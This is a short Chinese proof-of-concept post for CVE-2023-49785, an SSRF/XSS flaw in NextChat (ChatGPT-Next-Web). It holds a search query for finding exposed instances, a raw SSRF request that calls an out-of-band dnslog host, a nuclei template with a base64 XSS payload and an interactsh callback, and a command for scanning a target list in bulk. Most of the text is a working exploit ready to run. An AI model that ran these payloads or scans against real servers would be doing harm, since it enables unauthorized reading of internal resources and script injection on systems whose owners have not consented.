[在野利用]CVE-2023-49785漏洞复现（poc）

title="NextChat"

GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1Host: x.x.x.x:10000User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip

https://www.horizon3.ai/attack-research/attack-blogs/nextchat-an-ai-chatbot-that-lets-you-talk-to-anyone-you-want-to/

id: CVE-2023-49785info:  name: ChatGPT-Next-Web - SSRF/XSS  author: high  severity: critical  description: |    Full-Read SSRF/XSS in NextChat, aka ChatGPT-Next-Web  remediation: |    Do not expose to the Internet  reference:    - https://www.horizon3.ai/attack-research/attack-blogs/nextchat-an-ai-chatbot-that-lets-you-talk-to-anyone-you-want-to/    - https://github.com/ChatGPTNextWeb/ChatGPT-Next-Web  classification:    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N    cvss-score: 9.1    cve-id: CVE-2023-49785  metadata:    max-request: 1    shodan-query: title:NextChat,"ChatGPT Next Web"    verified: true  tags: cve,cve2023,ssrf,xss,chatgpt,nextchathttp:  - method: GET    path:      - "{{BaseURL}}/api/cors/data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23"      - "{{BaseURL}}/api/cors/http:%2f%2fnextchat.{{interactsh-url}}%23"    matchers-condition: or    matchers:      - type: dsl        dsl:          - contains(body_1, "<script>alert(document.domain)</script>")          - contains(header_1, "text/html")        condition: and      - type: dsl        dsl:          - contains(header_2,'X-Interactsh-Version')          - contains(interactsh_protocol_2,'dns')        condition: and

nuclei.exe -t mypoc/cve/CVE-2023-49785.yaml -l data/NextChat.txt